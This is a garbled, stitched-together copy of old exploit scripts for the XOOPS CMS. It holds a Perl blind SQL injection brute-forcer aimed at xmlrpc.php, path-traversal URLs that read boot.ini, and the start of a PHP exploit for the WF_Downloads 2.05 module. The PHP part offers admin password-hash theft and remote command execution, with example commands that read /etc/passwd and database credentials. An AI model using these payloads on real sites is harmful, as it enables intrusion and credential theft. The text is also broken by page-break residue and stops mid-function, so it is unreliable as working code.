# error_reporting0; ini_set"max_execution_time",0; ini_set"default_socket_timeout", 2; ob_implicit_flush 1; echo'XOOPS WF_Downloads module 2.05 SQL Injection body { background-color:#
Trang 1$data = '<?xml version="1.0"?>';
$data = '<methodCall>';
$data = '<methodName>blogger.getUsersBlogs</methodName>';
$data = '<params>';
$data = '<param>';
$data = '<value><string></string></value>';
$data = '</param>';
$data = '<param>';
$data = '<value><string>'.$name.'\' AND
ascii(substring(pass,'.$s_num.',1))'.$ccheck.')/*</string></value>';
$data = '</param>';
$data = '</params>';
$data = '</methodCall>';
$req = new HTTP::Request 'POST' => $url;
$req->content_type('application/xml');
$req->content($data);
$ua = new LWP::UserAgent;
$res = $ua->request($req);
$reply= $res->content;
if($reply =~ /Selected blog application does not exist/) { print "\n [-] NEWS BLOG DOES NOT EXIST =(\n [-] EXPLOIT FAILED!\n"; exit(); }
if($reply =~ /User authentication failed/) { return 0; }
else { return 1; }
}
sub status()
{
    # Redraw the progress spinner. The caller advances the global $n between
    # calls; the frame is chosen by $n % 5 (kept in the global $status), and
    # "\b\b" backs over the previous glyph before the next one is printed.
    # Only remainders 0-3 have a frame, so every fifth call prints nothing.
    my @frame = ("\b\b/]", "\b\b-]", "\b\b\\]", "\b\b|]");
    $status = $n % 5;
    print $frame[$status] if $status < @frame;
}
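sub usage()
{
    # Print the banner followed by the command-line help, then terminate.
    # head() is called with parentheses rather than the old `&head;` form,
    # which would also have handed it the caller's @_. The help text is a
    # single-quoted q() literal, so nothing in it is interpolated.
    head();
    print q(
USAGE:
r57xoops.pl [OPTIONS]
OPTIONS:
-u [url] - path to xmlrpc.php
-n [USERNAME] - user for bruteforce
E.G
r57xoops.pl -u http://server/xoops/xmlrpc.php -n admin
-
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
    exit();
}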
sub head()
{
    # Print the tool banner. A single-quoted heredoc keeps the text verbatim
    # (no interpolation), including the leading blank line.
    print <<'BANNER';

-
Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC
-
BANNER
}
Xoops (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit
Code:
<?php
/*
rgod:
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoop sConfig[language]= / / / / / / / / / /script
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoop sConfig[language]= / / / / / / / / / /boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsC onfig[language]= / / / / / / / / / /script
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsC onfig[language]= / / / / / / / / / /boot.ini%00
Trang 3?xoopsConfig[language]= / / / / / / / / / /script
http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php
?xoopsConfig[language]= / / / / / / / / / /boot.ini%00
added for future reference /str0ke
*/
# -XOOPS_WFd205_xpl.php 11.35 12/11/2005 #
# #
# XOOPS WF_Downloads Module v 2.05 SQL injection / #
# Admin credentials disclosure & remote commands execution all-in-one #
# by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# make these changes in php.ini if you have troubles #
# with this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-Tzu: "Indirect tactics, efficiently applied, are inexhaustible as Heaven # # and Earth, unending as the flow of rivers and streams; like the sun and #
# moon, they end but to begin anew; like the four seasons, they pass away to # # return once more #
// Script prologue: silence PHP errors, lift the execution-time limit, cap
// socket waits at 2 s and flush output as it is produced, then emit the HTML
// form that collects the script's parameters (host, path, credentials,
// action, pathtoWWW, table_prefix, port, command, proxy).
// NOTE(review): "Trang 4" / "Trang 5" inside the HTML below are page-break
// artifacts of the document extraction, not part of the original script.
// NOTE(review): $SERVER[PHP_SELF] in the form action is presumably a garbled
// $_SERVER['PHP_SELF']; it is interpolated into the page without escaping, so
// the request path would reach the browser verbatim — confirm against the
// original before reusing this form.
error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<html><head><title>XOOPS WF_Downloads module 2.05 SQL Injection
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
Trang 4{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #999933; } Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;} ></style></head><body><p class="Stile6"> XOOPS WF_Downloads module 2.05 SQL Injection </p><p class=" Stile6">a script by rgod at <a href="http://rgod.altervista.org"target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">
<form
name="form1" method="post"
action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&command=value&proxy=value&action=value"><p><input type="text"
name="host"> <span class="Stile5"> * hostname (ex: www.sitename.com)
</span></p>
<p><input type="text" name="path"><span class="Stile5"> * path ( ex: /xoops/ or just / )</span></p><p><input type="text" name="username"><span
class="Stile5"> *
username</span></p><p><input type="text" name="password"><span
class="Stile5"> *
and password, to retrieve a session cookie</span> </p> <p><input type="text" name="action"><span class="Stile5"> * action: "HASH" to disclose admin
loginname
& MD5 password hash, "CMD" to launch commands </span> </p><p> <input type="text"
name="pathtoWWW"><span class="Stile5">path to WWW ftom Mysql
directory,need this
Trang 5for " INTO OUTFILE " statement (default: / /www) </span></p><p> <input type="text" name="table_prefix"> <span class="Stile5"> specify a table prefix other than the default (fXZtr_)</span></p><p><input type="text" name="port">
<span class="Stile5">specify a port other than 80 (default value)</span> </p><p>
<input type="text" name="command"> <span class="Stile5">a Unix command, example:
ls -la to list directories, cat /etc/passwd to show passwd file, cat / /mainf
ile.php to see database username and password</span></p><p><input type="text" name="proxy"> <span class="Stile5"> send exploit through an HTTP proxy
(ip:port)
</span></p><p><input type="submit"name="Submit" value="go!"> </p> </form>
</td>
</tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
} $ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;